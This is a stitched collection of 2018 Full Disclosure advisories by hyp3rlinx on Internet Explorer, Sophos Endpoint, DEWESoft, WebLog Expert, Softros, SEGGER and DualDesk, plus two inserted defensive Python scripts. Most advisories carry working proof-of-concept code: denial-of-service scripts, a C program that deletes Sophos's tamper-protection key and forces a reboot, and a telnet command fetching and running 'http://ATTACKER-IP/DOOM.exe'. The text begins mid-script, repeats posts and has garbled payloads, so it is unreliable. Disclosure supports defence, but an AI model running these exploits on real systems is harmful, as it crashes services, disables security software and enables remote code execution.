'document.getElementById("hate").click();\n'+
'alert("DOH!");\n'+
'}\n'+
'setInterval("doit()", 2000)\n'+
'')

file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()

print 'MS InternetExplorer (Win 10) '
print 'Denial Of Service File Created.'
print 'hyp3rlinx'

Network Access:
Remote

Severity:
Medium

Disclosure Timeline:
Vendor Notification: April 18, 2018
vendor closes thread : April 19, 2018
April 20, 2018 : Public Disclosure
[FD] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec

Vendor:
www.microsoft.com

Product:
Internet Explorer (Windows 10) v11.371.16299.0

Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

Vulnerability Type:
Denial Of Service

CVE Reference:
N/A

Security Issue:
A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters a specially crafted HTML HREF tag containing an empty reference for certain Windows file types.

Upon IE crash it will at times daringly attempt to restart itself; if that occurs and the user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the crash all over again.

This can be leveraged by visiting a hostile webpage or link to crash an end user's MSIE browser.
Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :)

Tested Windows 10

Stack Dump:
(2e8c.27e4): Access violation - code c005 (first/second chance not available)
ntdll!NtWaitForMultipleObjects+0x14:
7ffa`be5f0e14 c3 ret
0:015> r
rax=005b rbx=0003 rcx=0003
rdx=00cca6efd3a8 rsi= rdi=0003
rip=7ffabe5f0e14 rsp=00cca6efcfa8 rbp=
r8= r9= r10=
r11=0246 r12=0010 r13=00cca6efd3a8
r14= r15=
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!NtWaitForMultipleObjects+0x14:
7ffa`be5f0e14 c3 ret

CONTEXT: (.ecxr)
rax= rbx=01fd4a2ec9d8 rcx=
rdx=7ffabb499398 rsi=01fd4a5b0ce0 rdi=
rip=7ffabb7fc646 rsp=00cca6efe4f8 rbp=00cca6efe600
r8= r9=8000 r10=7ffabb499398
r11= r12= r13=7ffabb48d060
r14=0002 r15=0001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
KERNELBASE!StrCmpICW+0x6:
7ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:`=
Resetting default scope

FAULTING_IP:
KERNELBASE!StrCmpICW+6
7ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]

EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 7ffabb7fc646 (KERNELBASE!StrCmpICW+0x0006)
ExceptionCode: c005 (Access violation)
ExceptionFlags:
NumberParameters: 2
Parameter[0]:
Parameter[1]:
Attempt to read from address

DEFAULT_BUCKET_ID: NULL_POINTER_READ

PROCESS_NAME: iexplore.exe

POC video URL:
https://vimeo.com/265691256/

Exploit/POC:
1) Run below python script to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10

payload=('\n'+
'MSIE v11.371.16299 Denial Of Service by hyp3rlinx \n'+
'crashy ware shee\n'+
'\n'+
'Tested successfully on Windows 10\n'+
'\n'
'function doit(){\n'+
'document.getElementById("hate").click();\n'
'alert("DOH!");\n'+
'obj.click();\n'+
'obj.click();\n'+
'}\n'+
'setInterval("doit()", 2000)\n'+
'')

file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()

print 'MS InternetExplorer (Win 10) '
print 'Denial Of Service File Created.'
print 'hyp3rlinx'

Network Access:
Remote

Severity:
Medium

Disclosure Timeline:
Vendor Notification: April 18, 2018
vendor closes thread : April 19, 2018
April 20, 2018 : Public Disclosure
Re: [FD] CVE-2018-4863 Sophos Endpoint Protection v10.7 / Tamper Protection Bypass
should have included more details for this report, no, you need to be admin. I believe the enhanced tamper protection safeguards the services even in safe mode among other things like uninstalling etc...

On Wed, Apr 4, 2018 at 3:48 AM, Buherátor wrote:
> The affected key under HKLM is writable by regular users? A Get-ACL[1]
> output would be appreciated!
>
> And why do you put a batch script inside C code? o.O
>
> [1] https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-6
>
> Buherátor - @buherator
> PGP: 1DD5 6AFB 0660 4106 7B70 4F71 B84C 47BD 86EA 1855
>
>
> 2018-04-04 6:04 GMT+02:00 hyp3rlinx :
> > [+] Credits: John Page (aka hyp3rlinx)
> > [+] Website: hyp3rlinx.altervista.org
> > [+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt
> > [+] ISR: Apparition Security
> >
> > Vendor:
> > www.sophos.com
> >
> > Product:
> > Sophos Endpoint Protection v10.7
> >
> > Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system.
> > Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware, anti-malware, web security, malicious traffic detection, and deep system cleanup.
> > > > > > > > Vulnerability Type: > > === > > Tamper Protection Bypass > > > > > > CVE Reference: > > == > > CVE-2018-4863 > > > > > > Security Issue: > > > > Sophos Endpoint Protection offers an enhanced tamper protection mechanism > > disallowing changes to be made to the Windows registry > > by creating and setting a special registry key "SEDEnabled" as follows: > > > > HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint > > Defense\TamperProtection\Config > > Create the following registry key: > > "SEDEnabled"=dword:0001" > > > > From "https://community.sophos.com/kb/en-us/124376"; documentation: > > "You must enable the basic Tamper Protection feature on an endpoint in > > order to use the Enhanced Tamper Protection" > > > > However, this protection mechanism can be bypassed by deleting the > > following registry key as it is not sufficiently protected. > > "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos > Endpoint > > Defense\" > > > > By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper > > Protection" once the system has been rebooted. > > Attackers can then create arbitrary registry keys or edit keys and > settings > > under the protected "tamper" protection config key. > > The issue undermines the integrity of the endpoint protection as deleting > > this key stops the tamper protect driver from loading. > > > > > > SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed > > customers customers are unaffected. > > All SAV OPM Preview subscribers have had the fix since 2018-03-01. > > > > > > > > Exploit/POC: > > = > > Compile the below malicious POC "C" code and run on target, PC will > reboot > > then we pwn. 
> > > > gcc -o sophos-poc.exe sophos-poc.c > > > > "sophos-poc.c" > > > > /***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS > > Even with "SEDEnabled"=dword:0001" set in registry to prevent > tampering > > https://community.sophos.com/kb/en-us/124376 > > By hyp3rlinx **/ > > > > int main(void){ > > system("reg delete > > \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos > Endpoint > > Defense\" /f"); > > system("shutdown -t 0 -r -f"); > > return 0; > > } > > > > > > > > Network Access: > > === > > Local > > > > > > > > Severity: > > = > > High > > > > > > > > Disclosure Timeline: > > = > > Vendor Notification: December 4, 2017 > > Vendor Acknowledgement: December 12, 2017 > > Vendor release fixes: March 1, 2018 > > Vendor request additional time before di
[FD] [FIXED TYPO **] CVE-2018-9233 Sophos Endpoint Protection Control Panel v10.7 / Insecure Crypto
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-CONTROL-PANEL-v10.7-INSECURE-CRYPTO-CVE-2018-9233.txt
[+] ISR: Apparition Security

Vendor:
=====
www.sophos.com

Product:
=====
Sophos Endpoint Protection - Control Panel v10.7

Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system. Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware, anti-malware, web security, malicious traffic detection, and deep system cleanup.

Vulnerability Type:
=====
Insecure Crypto

CVE Reference:
=====
CVE-2018-9233

Security Issue:
=====
Sophos Endpoint Protection control panel authentication uses a weak, unsalted Unicode cryptographic hash (SHA1) function; not using a salt allows attackers who gain access to the hash to conduct faster cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This can potentially result in unauthorized access that could allow changing settings, whitelisting or unquarantining files.

Password and config for the Sophos Endpoint Protection control panel is stored here:
C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml

e.g. SHA1 (Unicode) encoding, non-salted, pass = abc123
689307D2FC53AF0FB941BC1BB42737CE4F3EF540

Using PHP's sha1 function with "mb_convert_encoding" as UTF-16LE we can verify.

C:\>php -r "print sha1(mb_convert_encoding('abc123', 'UTF-16LE', 'UTF-8'));"
689307d2fc53af0fb941bc1bb42737ce4f3ef540

Network Access:
=====
Local

Severity:
=====
Low

Disclosure Timeline:
=====
Vendor Notification: December 4, 2017
Vendor Acknowledgement: December 12, 2017
Vendor requested additional time before disclosing; additional time has passed.
April 4, 2018 : Public Disclosure
[FD] CVE-2018-9233 Sophos Endpoint Protection Control Panel v10.7 / Insecure Crypto
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-CONTROL-PANEL-v10.7-INSECURE-CRYPTO-CVE-2018-9233.txt
[+] ISR: Apparition Security

Vendor:
=====
www.sophos.com

Product:
=====
Sophos Endpoint Protection - Control Panel v10.7

Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system. Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware, anti-malware, web security, malicious traffic detection, and deep system cleanup.

Vulnerability Type:
=====
Insecure Crypto

CVE Reference:
=====
CVE-2018-9233

Security Issue:
=====
Sophos Endpoint Protection control panel authentication uses a weak, unsalted Unicode cryptographic hash (SHA1) function; not using a salt allows attackers who gain access to the hash to conduct faster cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This can potentially result in unauthorized access that could allow changing settings, whitelisting or unquarantining files.

Password and config for the Sophos Endpoint Protection control panel is stored here:
C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml

e.g. SHA1 (Unicode) encoding, non-salted, pass = abc123
689307D2FC53AF0FB941BC1BB42737CE4F3EF540

Using PHP's sha1 function with "mb_convert_encoding" as UTF-16LE we can verify.

C:\>php -r "print sha1(mb_convert_encoding('abc123', 'UTF-16LE', 'UTF-8'));"
689307d2fc53af0fb941bc1bb42737ce4f3ef540

Network Access:
=====
Local

Severity:
=====
Low

Disclosure Timeline:
=====
Vendor Notification: December 4, 2017
Vendor Acknowledgement: December 12, 2017
Vendor release fixes: March 1, 2018
Vendor requested additional time before disclosing; additional time has passed.
April 4, 2018 : Public Disclosure
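As an added illustration of the weakness this advisory (and its earlier posting above) describes, and not the author's or Sophos's code: the Python below reproduces the unsalted SHA1-over-UTF-16LE scheme to verify the quoted hash, shows why a missing salt lets one precomputed table serve every installation, and contrasts it with a salted, iterated PBKDF2 record. The candidate word list is constructed for the example.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Hash the advisory quotes from machine.xml for the password "abc123".
ADVISORY_HASH = "689307D2FC53AF0FB941BC1BB42737CE4F3EF540"

# Candidate words constructed for this example (a real table would be far larger).
CANDIDATES = ["password", "letmein", "abc123", "Sophos123"]


def legacy_sha1_utf16le(password: str) -> str:
    """The scheme the advisory describes: unsalted SHA-1 over the UTF-16LE bytes
    of the password. Python's "utf-16-le" codec emits no byte-order mark, so the
    input bytes are the same as PHP's mb_convert_encoding(..., 'UTF-16LE')."""
    return hashlib.sha1(password.encode("utf-16-le")).hexdigest()


def legacy_verify(password: str, stored_hex: str) -> bool:
    """Constant-time check of a password against a stored legacy hash."""
    return hmac.compare_digest(legacy_sha1_utf16le(password), stored_hex.lower())


def precomputed_lookup(stored_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Why the missing salt matters: a table built once from a word list matches
    the same password on every installation, so recovering a stored hash is a
    dictionary lookup rather than per-account work."""
    table = {legacy_sha1_utf16le(c): c for c in candidates}
    return table.get(stored_hex.lower())


def pbkdf2_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = 600_000) -> str:
    """Salted, iterated alternative: PBKDF2-HMAC-SHA256 with a random 16-byte
    salt, stored as "pbkdf2_sha256$<iterations>$<salt hex>$<dk hex>"."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password: str, record: str) -> bool:
    """Re-derive with the salt and iteration count carried in the record."""
    try:
        algo, iters, salt_hex, dk_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    except ValueError:
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(legacy_sha1_utf16le("abc123"))                  # 689307d2...ef540
    print(precomputed_lookup(ADVISORY_HASH, CANDIDATES))  # abc123
    rec = pbkdf2_hash("abc123")
    print(rec)
    print(pbkdf2_verify("abc123", rec), pbkdf2_verify("abc124", rec))
```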
[FD] CVE-2018-4863 Sophos Endpoint Protection v10.7 / Tamper Protection Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt
[+] ISR: Apparition Security

Vendor:
=====
www.sophos.com

Product:
=====
Sophos Endpoint Protection v10.7

Sophos Endpoint Protection helps secure your workstation by adding prevention, detection, and response technology on top of your operating system. Sophos Endpoint Protection is designed for workstations running Windows and macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware, anti-malware, web security, malicious traffic detection, and deep system cleanup.

Vulnerability Type:
=====
Tamper Protection Bypass

CVE Reference:
=====
CVE-2018-4863

Security Issue:
=====
Sophos Endpoint Protection offers an enhanced tamper protection mechanism disallowing changes to be made to the Windows registry by creating and setting a special registry key "SEDEnabled" as follows:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config
Create the following registry key:
"SEDEnabled"=dword:0001"

From "https://community.sophos.com/kb/en-us/124376" documentation:
"You must enable the basic Tamper Protection feature on an endpoint in order to use the Enhanced Tamper Protection"

However, this protection mechanism can be bypassed by deleting the following registry key as it is not sufficiently protected.
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\"

Deleting this key bypasses the Sophos Endpoint "Enhanced Tamper Protection" once the system has been rebooted. Attackers can then create arbitrary registry keys or edit keys and settings under the protected "tamper" protection config key. The issue undermines the integrity of the endpoint protection as deleting this key stops the tamper protect driver from loading.

SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed customers are unaffected.
All SAV OPM Preview subscribers have had the fix since 2018-03-01.

Exploit/POC:
=====
Compile the below malicious POC "C" code and run on target, PC will reboot then we pwn.

gcc -o sophos-poc.exe sophos-poc.c

"sophos-poc.c"

/***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS
Even with "SEDEnabled"=dword:0001" set in registry to prevent tampering
https://community.sophos.com/kb/en-us/124376
By hyp3rlinx **/

#include <stdlib.h>   /* system() */

int main(void){
    /* remove the key the tamper-protection driver depends on, then force a reboot */
    system("reg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\" /f");
    system("shutdown -t 0 -r -f");
    return 0;
}

Network Access:
=====
Local

Severity:
=====
High

Disclosure Timeline:
=====
Vendor Notification: December 4, 2017
Vendor Acknowledgement: December 12, 2017
Vendor release fixes: March 1, 2018
Vendor requested additional time before disclosing; additional time has passed.
April 4, 2018 : Public Disclosure
[FD] DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access - CVE-2018-7756
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security

Vendor:
=====
www.dewesoft.com

Product:
=====
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe

Vulnerability Type:
=====
Remote Internal Command Access

CVE Reference:
=====
CVE-2018-7756

Security Issue:
=====
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component, does not require authentication for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or run a "SETFIREWALL Off" command.

The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.

Internal commands used by "RunExeFile.exe" for which I could not find any documentation:

RUN
RUNEX
GETFIREWALL
SETFIREWALL Off
KILL
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE

Exploit/POC:
=====
TELNET x.x.x.x 1999
RUN calc.exe

OR

Launch the victim's browser and send them to a website for a drive-by download etc.

TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe

Then from the TELNET session execute it from the Downloads directory.

runexe c:\Users\victim\Downloads\DOOM.exe

Network Access:
=====
Remote

Severity:
=====
High

Disclosure Timeline:
=====
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replies, update or addressing of the issue by vendor.
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
March 10, 2018 : Public Disclosure
[FD] WebLog Expert Web Server Enterprise v9.4 / Remote Denial Of Service CVE-2018-7582
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security

Vendor:
=====
www.weblogexpert.com

Product:
=====
WebLog Expert Web Server Enterprise v9.4

WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.

Vulnerability Type:
=====
Denial Of Service

CVE Reference:
=====
CVE-2018-7582

Security Issue:
=====
WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service (daemon crash) via a long HTTP Accept header to TCP port 9991.

(e7c.1750): CLR exception - code e0434352 (first/second chance not available)
eax= ebx=06d1d098 ecx=0005 edx= esi=0002 edi=
eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!NtWaitForMultipleObjects+0x15:
778d016d 83c404 add esp,4

Exploit/POC:
=====
# Python 3
import socket

print('Weblog Expert Server / Denial Of Service')
print('hyp3rlinx')

IP = 'Weblog Expert Server IP'
PORT = 9991

# HTTP/1.0 request whose Accept header is padded to ~2000 bytes
PAYLOAD = ("GET /index.html HTTP/1.0\r\n"
           "Host: " + IP + ":9991\r\n"
           "User-Agent: Mozilla\r\n"
           "Accept: */*" + "A" * 2000 + "\r\n\r\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
s.send(PAYLOAD.encode())
s.close()

Network Access:
=====
Remote

Severity:
=====
Medium

Disclosure Timeline:
=====
Vendor Notification: February 3, 2018
Second attempt : February 17, 2018
March 7, 2018 : Public Disclosure
[FD] WebLog Expert Web Server Enterprise v9.4 / Authentication Bypass CVE-2018-7581
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-AUTHENTICATION-BYPASS.txt
[+] ISR: Apparition Security

Vendor:
=====
www.weblogexpert.com

Product:
=====
WebLog Expert Web Server Enterprise v9.4

WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.

Vulnerability Type:
=====
Authentication Bypass

CVE Reference:
=====
CVE-2018-7581

Security Issue:
=====
The "WebServer.cfg" under "ProgramData\WebLog Expert\WebServer\" used by WebLog Expert Web Server Enterprise 9.4 has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin.

A standard (non-Administrator) Windows user can edit the 'WebServer.cfg' file under "C:\ProgramData\WebLog Expert\WebServer", set a cleartext password and login as admin.

e.g.

C:\ProgramData\WebLog Expert\WebServer>cacls * | more
C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C
                                                     BUILTIN\Administrators:(ID)C
                                                     NT AUTHORITY\SYSTEM:(ID)F
                                                     BUILTIN\Administrators:(ID)F

Exploit/POC:
=====
Login as a 'Standard' Windows user.
Comment out the Admin hashed password using ';' then add any cleartext password as follows.

[User:admin]
Password=1234
;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0
bAllProfiles=1

Now log in as Admin! :)

Network Access:
=====
Local

Severity:
=====
Medium

Disclosure Timeline:
=====
Vendor Notification: March 1, 2018
No replies from previous attempts
March 7, 2018 : Public Disclosure
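Added example, not part of the advisory and not WebLog Expert's code: a small audit that reads a WebServer.cfg-style file and flags [User:*] sections where the cleartext Password override is in use or the PasswordHash line has been commented out, which is the state the PoC above leaves the file in. The sample config is constructed from the layout shown; the second user and its hash value are placeholders.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample in the layout the advisory shows (not a real WebServer.cfg).
# The "reports" user and its hash are placeholders.
SAMPLE_CFG = """\
[Server]
Port=9991

[User:admin]
Password=1234
;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0
bAllProfiles=1

[User:reports]
PasswordHash=0123456789ABCDEF0123456789ABCDEF01234567
bAllProfiles=0
"""


@dataclass
class Finding:
    section: str
    issue: str


def _split_kv(line: str) -> Tuple[Optional[str], Optional[str]]:
    """Split "Key=Value"; returns (None, None) for lines without '='."""
    key, sep, value = line.partition("=")
    return (key.strip(), value.strip()) if sep else (None, None)


def audit_webserver_cfg(text: str) -> List[Finding]:
    """Flag [User:*] sections where a cleartext Password is set or where the
    PasswordHash line has been commented out with ';' or '#'. A plain INI
    parser would silently drop the commented line, so this walks the file
    line by line and keeps the comment marker as a signal."""
    findings: List[Finding] = []
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section is None or not section.startswith("User:"):
            continue
        commented = line[0] in ";#"
        key, value = _split_kv(line.lstrip(";#").strip())
        if key is None:
            continue
        if key == "Password" and not commented and value:
            findings.append(Finding(section, "cleartext Password is set"))
        elif key == "PasswordHash" and commented:
            findings.append(Finding(section, "PasswordHash is commented out"))
    return findings


def audit_cfg_file(path: str) -> List[Finding]:
    """Convenience wrapper for a file on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_webserver_cfg(fh.read())


if __name__ == "__main__":
    for f in audit_webserver_cfg(SAMPLE_CFG):
        print(f"[{f.section}] {f.issue}")
```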
[FD] Softros Network Time System Server v2.3.4 / Denial Of Service CVE-2018-7658
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security

Vendor:
=====
www.softros.com
https://nts.softros.com/downloads/

Product:
=====
Network Time System Server v2.3.4
Both x86/x64 versions

Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment, establishing an interconnected time synchronization system for each and every machine and device on the company network.

Vulnerability Type:
=====
Denial Of Service

CVE Reference:
=====
CVE-2018-7658

Security Issue:
=====
The Network Time System (Server) "NTSServerSvc" service listens on Port 7001; unauthenticated remote attackers can crash the Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization could then potentially be impacted.

Stack dump:
'''
eax=0320119a ebx=000b ecx=00ff edx= esi=03167040 edi=0050b328
eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010297
NTSServerSvc+0x69a5:
004069a5 880a mov byte ptr [edx],cl ds:0023:=??

Resetting default scope

FAULTING_IP:
NTSServerSvc+69a5
004069a5 880a mov byte ptr [edx],cl

EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 004069a5 (NTSServerSvc+0x69a5)
ExceptionCode: c005 (Access violation)
'''

Exploit/POC:
=====
# Python 3
import socket

# Network Time System (Server) NTSServerSvc.exe v2.3.4
# Softros Systems
# NTS Server service for time synchronization over network

print('Network Time Server 11 byte Denial Of Service')
print('by hyp3rlinx')

HOST = input('Network Time Server IP> ')
PORT = 7001
payload = b'A' * 11   # exactly 11 bytes triggers the crash

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(payload)
s.close()

Network Access:
=====
Remote

Severity:
=====
Medium

Disclosure Timeline:
=====
Vendor Notification: February 10, 2018
Second attempt : February 24, 2018
Request CVE, assigned by Mitre : March 3, 2018
March 5, 2018: Public Disclosure
[FD] CVE-2018-7449 SEGGER embOS/IP FTP Server v3.22 / FTP CMDs Denial Of Service
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security

Vendor:
=====
www.segger.com

Product:
=====
embOS/IP FTP Server v3.22

Vulnerability Type:
=====
FTP Commands Denial Of Service

CVE Reference:
=====
CVE-2018-7449

Security Issue:
=====
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash) via an invalid LIST, STOR, or RETR command.

STOR 666\r\n
LIST\r\n
RETR '+'..\\'*8+'Windows\system.ini\r\n

TELNET x.x.x.x 21
220 Welcome to embOS/IP FTP server
USER anonymous
331 Password required.
PASS anonymous
230 User logged in, proceed.
STOR Bye!

CRASH!!!

Exploit/POC:
=====
# Python 3
import socket, time

VICTIM = input('[+]Segger v3.22 FTP Server IP > ')
USR = 'anonymous'
PWD = 'anonymous'
CMD = "STOR Bye!\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((VICTIM, 21))
print(s.recv(1024))  # Receive FTP banner
time.sleep(1)
s.send(("USER " + USR + "\r\n").encode())
print(s.recv(1024))
time.sleep(1)
s.send(("PASS " + PWD + "\r\n").encode())
# print(s.recv(1024))
time.sleep(1)
s.send(CMD.encode())
print('Sent %s' % CMD)
s.close()

Network Access:
=====
Remote

Severity:
=====
Medium

Disclosure Timeline:
=====
Vendor Notification: February 17, 2018
Vendor acknowledgement: February 19, 2018
Vendor released fixed version v3.22a : February 23, 2018
March 1, 2018 : Public Disclosure
[FD] DualDesk v20 "Proxy.exe" Server / Denial Of Service - CVE-2018-7583
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security

Vendor:
=====
www.dualdesk.com

Product:
=====
DualDesk v20

DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no configuration.

Vulnerability Type:
=====
Denial Of Service

CVE Reference:
=====
CVE-2018-7583

Security Issue:
=====
Remote unauthenticated attackers can crash the "Proxy.exe" Server component of the DualDesk application, which listens on TCP Port 5500, by sending a long string of junk chars.

(d24.d60): Security check failure or stack buffer overrun - code c409 (first/second chance not available)
eax= ebx=0257f1c0 ecx= edx= esi=0002 edi=
eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!NtWaitForMultipleObjects+0x15:
77c6016d 83c404 add esp,4

Exploit/POC:
=====
Start the DualDesk "Run Proxy as Application".

C:\>python -c "print 'a'*8000" > crash.txt
C:\>type crash.txt | nc.exe localhost 5500

Crash!!!

Network Access:
=====
Remote

Severity:
=====
Medium

Disclosure Timeline:
=====
Vendor Notification: February 4, 2018
Second attempt : February 17, 2018
Request CVE, assigned by Mitre : March 1, 2018
March 1, 2018 : Public Disclosure
[FD] CVE-2018-6892 CloudMe Sync <= v1.10.9 Unauthenticated Remote Buffer Overflow
